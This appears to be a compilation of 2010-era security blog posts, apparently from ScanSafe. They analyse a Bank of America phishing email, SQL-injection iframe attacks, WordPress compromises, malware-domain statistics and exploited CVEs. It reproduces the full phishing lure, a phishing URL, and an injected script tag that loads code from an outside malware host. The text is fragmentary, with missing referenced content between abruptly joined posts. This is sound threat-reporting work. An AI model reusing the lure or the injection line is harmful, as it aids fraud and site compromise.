Dear Bank of America Customer,

We recently have determined that different computers have logged in your Bank of America Online Banking account, and multiple password failures were present before the logons. We now need you to re-confirm your account information to us. If this is not completed by July 31st, 2010, we will be forced to suspend your account indefinitely, as it may have been used for fraudulent purposes. We thank you for your cooperation in this manner. In order to confirm your Online Bank records, we may require some specific information from you.

To restore your account, please Sign in to Online Banking.

Here's where victims get sauced. The link behind "Sign in to Online Banking" actually points to gramsbbq.org/bain. Now grambbq.org is the legitimate website for Gram's Mission Barbecue Palace in Riverside, CA. The gramsbbq.org/bain page is a 302 redirect that leads to a phishing page hosted on a second compromised site: chasingarcadia.com (the website for Canadian band Chasing Arcadia). The actual phishing page is at:

http://www.chasingarcadia.com/channel/safe.sslbankofamerica.com/index.htm

This use of compromised sites as redirectors and phishing host enables the attackers to bypass reputation filters and/or community-based trust reporting. And it increases the collateral damage, because if/when the compromised sites are blacklisted, those businesses could suffer as a result.

Anyway, in some of the reports, one of the sites claimed to be compromised was that of the Wall Street Journal (WSJ.com). However, ScanSafe investigation reveals the SQL injection attack that appeared on certain pages of the WSJ site weren't the result of compromise on WSJ directly, but rather the result of compromise of a third-party partner.

That partner, adicio.com, provides real estate listings that are in turn displayed on certain pages of the WSJ.com website.

Of course, from a site visitor's perspective, this might seem a bit semantic. But still, it is worth pointing out that it wasn't really wsj.com that was compromised.

script src=http://ww.robint.us/u.js

Search on the full iframe with quotes and you get about 7k hits in Google. But search on just the domain name or omit the quotes and you get over a million hits. That's because the more generic search picks up any page that mentions the domain or includes any mix of those keywords. This loosely constructed search mistake causes some to believe the attack is much larger than it really is.

Certainly 7k Web pages compromised is nothing to sneeze at but it's certainly not a million pages and certainly nothing new - many of these same compromised pages have been repeatedly compromised in one SQL injection attack after another since 2007.

On a more positive note, when SQL injection attacks first went mainstream a few years back, it wasn't uncommon to see a million+ pages compromised in a single attack. From that perspective, 7k is a vast improvement and shows that at least many sites are paying attention and taking the appropriate security measures. On the downside, attacks like robint.us are just one of over a thousand unique attacks carried out via the Web each month.

• 16196 unique malicious domains.
• The top ten malicious domains comprised 23% of all Web malware attacks in May 2010.
• Five of the top ten were related to attacks against GoDaddy-hosted websites, for a total of 14% of all Web malware in May 2010.
• Top Web malware was Trojan.JS.Redirector.cq, the majority of which resulted from attacks against GoDaddy-hosted websites.
• Gumblar was the second most prevalent Web malware encountered, at 7%.
• Third most prevalent Web-distributed malware encountered was Backdoor.Win32.Alureon, at 6%.

Top Ten Malicious Domains, May 2010

holasionweb.com* - 7%
www.sitepalace.com - 3%
losotrana.com* - 2%
indesignstudioinfo.com* - 2%
kdjkfjskdfjlskdjf.com* - 2%
easfindnex.org - 2%
findermar.org - 2%
76.73.33.109 - 2%
findrasup.org - 1%
zettapetta.com* - 1%

*Related to attacks against GoDaddy-hosted websites

Top Ten Web Malware, May 2010

Trojan.JS.Redirector.cq - 14%
Exploit.JS.Gumblar - 7%
Backdoor.Win32.Alureon - 6%
Exploit.Java.CVE-2009-3867.d - 3%
Trojan.JS.Redirector.at - 3%
Downloader.JS.Agent.fhx - 2%
OI.Backdoor.Win32.Autorun.cx - 2%
OI.Win32.Susp.ms - 2%
Trojan.Iframe.f - 2%
Trojan.GIFIframe.a - 2%

The v3p2.com attack drops a cookie to track victims, checks for the presence of Rising AV or 360Safe antivirus, then exploits the "use after free" vulnerability in Microsoft Internet Explorer versions 6 (including SP1) and 7 (CVE-2010-0806 / MS10-018).

Successful exploit leads to the silent installation of a data theft trojan delivered from n9uo.com. Both attack domains - v3p2.com and n9uo.com - were registered on May 7th. Referrers to the v3p2.com domain indicated the attack was originating from the popular greatandhra.com website.

Coincidentally (or not), greatandhra.com was mentioned on Hack Forums (tagline Packets, Punks, and Posts) on May 2nd for having a vulnerable/accessible mysql.user root entry. A subsequent post to the thread (also on May 2nd) by someone using the moniker jfmherokiller claimed shell access had been gained.

First encounters resulting from these attack began on May 10th, eight days after the initial allegations that root access to greatandhra.com had been gained and three days after the v3p2.com and n9uo.com malware domains were registered.

1 & 1
DreamHost
In2Net
Hostway
Media Temple
ServerBeach

and several others. While many of the compromised sites are using WordPress, some are not.

The two main attacks are: (1) the Google / WordPress pharma attacks and (2) the Grepad.com family of attacks that netted Network Solutions hosted sites, some U.S. Treasury sites, and many, many popular niche 'mom and pop' style sites.

Google / WordPress Pharma Hacks

In the Google / WordPress pharma attack, the attackers are targeting popular Web pages and modifying the title tag of those pages to include a pharmaceutical sales pitch. Searches that would normally cause the legitimate site to appear in search engine results pages (SERPs) will also include the manipulated title tag. The link itself still points to the legitimate site, but modifications on the compromised site will cause an automatic redirect to the pharmaceutical site.

Note that many of the sites that appear in Google SERPs for these title tags are not necessarily compromised. Quite often, blog and forum comments will adopt the title tag of the post and spammers are using these same tags. For those that are compromised, currently the redirect points to "thepharmacydiscount.com/group/bestsellers.html?said=compromised.com" where compromised.com equals the name of the legitimate (but compromised site) that is delivering the redirect.

The point behind the Google / WordPress pharma attacks is to leverage the popularity ranking of the compromised sites, which boosts the SERPs ranking for the pharma keywords used.

Grepad.com Attacks

The intent of the Grepad.com family of attacks is not to gain favorable placement in SERPs to peddle counterfeit viagra, but rather to download malware to the site visitors' PCs. Pages on the compromised websites are embedded with hidden iframes that load content from the malware domain. Multiple malware domains have been used in these attacks, including grepad.com, ginopost.com, bigcorpads.com, binglbalts.com, corpadsinc.com, hugeadsorg.com, mainnetsoll.com  and networkads.net. Exploits of multiple vulnerabilities are attemped in order to download this malware. A list of observed exploits can be found in this blog post.

Commonalities Between Attacks

In both sets of attacks, the attackers are filtering based on whether the clickthrough to the site is human or a search spider. In the pharma attacks, the malformed title is only presented to search spiders and the redirect only occurs if you click the link from SERPs. If you visit the site directly, by typing in the URL or from a non-SERPs link on another site, the legitimate page will load normally.

The exact opposite is true with the Grepad.com family of attacks. In these cases, the filters suppress the compromise so that search spiders don't see the embedded iframe. If the link is accessed directly (or via a link from a non-search engine), then the iframe will be rendered. However, the attackers also drop a cookie when visitors hit a compromised page and suppress the iframe on subsequent visits.

Filtering is also being done by IP address ranges, operating system, and user_agent to determine when the embedded iframe (or pharma redirect) will occur.

The Million Dollar Question: How?

The why is easy to answer: attackers want to make money. The how is a bit more cloudy.

It appears the attacker is able to read wp-config.php which by necessity contains plaintext credentials for the WordPress database. Normally, wp-config.php should not be externally readable, unless the user has not properly configured file permissions. In any event, once initial access was gained, the attackers inserted or modified entries in the wp-option table for the active WordPress database. In subsequent phases (in the case of the Grepad family), the attackers modified php.ini / .htaccess, uploading malicious scripts which then embed the iframe.

At this point, the attackers have the ability to plant PHP backdoors on the compromised sites, a precedent first set by Gumblar. The presence of the backdoor would allow continued access to the compromised sites, even after file permissions were properly configured or FTP credentials had been changed. And if proper segregation is not done, bleed over to other sites on the same hosted share can still occur.

It's worth noting that the U.S. Bureau of Engraving and Printing (bep.gov and moneyfactory.gov) were compromised in the most recent wave of the Grepad.com attacks. While neither of these sites appear to have been using WordPress, both were hosted by Network Solutions and appear to have been published with Network Solutions Website Builder.

• Adobe Reader and Acrobat util.printf stack-based buffer overflow (CVE-2008-2992)
• Adobe Reader and Acrobat getIcon stack-based buffer overflow (CVE-2009-0927)
• Office OCX OpenWebFile    (BID-33243)
• Symantec AppStream LaunchObj ActiveX control (CVE-2008-4388)
• Hummingbird PerformUpdateAsync    (CVE-2008-4728)
• Peachtree ExecutePreferredApplication (CVE-2008-4699)
• C6 Messenger propDownloadUrl (CVE-2008-2551)
• Internet Explorer memory corruption (MS09-002)

The malware host, ginopost.com, was registered on April 25th, using the same IP address (188.124.16.104) as a series of malware hosts that have been engaged in attacks on Network Solutions hosted WordPress blogs. Previous malware domains using that IP have included bigcorpads.com, binglbalts.com, corpadsinc.com, hugeadsorg.com, mainnetsoll.com  and networkads.net.

Attacks on WordPress-published websites have not been restricted to those hosted by Network Solutions. A separate ongoing series of attacks have also been targeted against WordPress-published sites hosted by GoDaddy.

The malicious links in the search engine results pages (SERPs) look innocent enough at first glance:

Look more closely however, and you'll note the nonsensical phrasing in the shadowdesigns.co.uk and poshpongs.com results that are sandwiched between mtv.com and last.fm. Equally telling is the ?sdoc=erica+badu appended to those links.

Searching inurl:.php/?sdoc=erica+badu on Google reveals about 400 sites are being used to promote malicious Erica Badu links. A more generic search for inurl:.php/?sdoc= results in even more poisoned listings for various celebs and diverse topics. The Yahoo search engine was also observed dishing up malicious search results over the past weeekend for topics ranging from the CN Tower design to extraterrestrial invasions.

In 2009, Koobface comprised considerably less than 1% of all Web malware. A closer look at 2010 data reveals that less than 10% of enterprises actually have users that click a Koobface link. The highest rate was March, when 11% had users that clicked through; the lowest was February at 6%. Of those enterprises that do click through, the median rate per enterprise is only 3 clicks each.

For total volume, in January 2010, Koobface comprised only 0.55% of all Web malware; February was lowest at 0.15%, and March the highest at 3.1%.

Thus far in April, only 1% of enterprises have users that clicked a Koobface link. The median rate for those is 3 clicks each. Currently Koobface comprises only 1% of April Web malware blocks.

However, if you happen to be located in Zimbabwe it's a completely different story. Zimbabwe sports a Koobface-clickthrough rate that's hundreds of times above the norm.

Successful exploit leads to the download of a binary (also hosted on the same domain) which in observed cases has been a variant of the Bredolab trojan.

http://www.virustotal.com/analisis/ef614084582abbeba2609177f33244f5978892ac85a5613a687965a482388b0e-1269983048

Bredolab acts as a downloader agent. In the cases we've observed, this particular variant of Bredolab is downloading Zbot/Zeus.

Encounters with these attacks are fairly steady and comprised 1% of all ScanSafe Web malware blocks in March (compared to Gumblar at 17%). What's particularly interesting about these attacks isn't the volume, but rather that they appear to be a vector for rapid deployment of the latest zero day exploits. And while the IP addresses and domain names for the attacker-owned sites have changed, the delivery method has remained constant.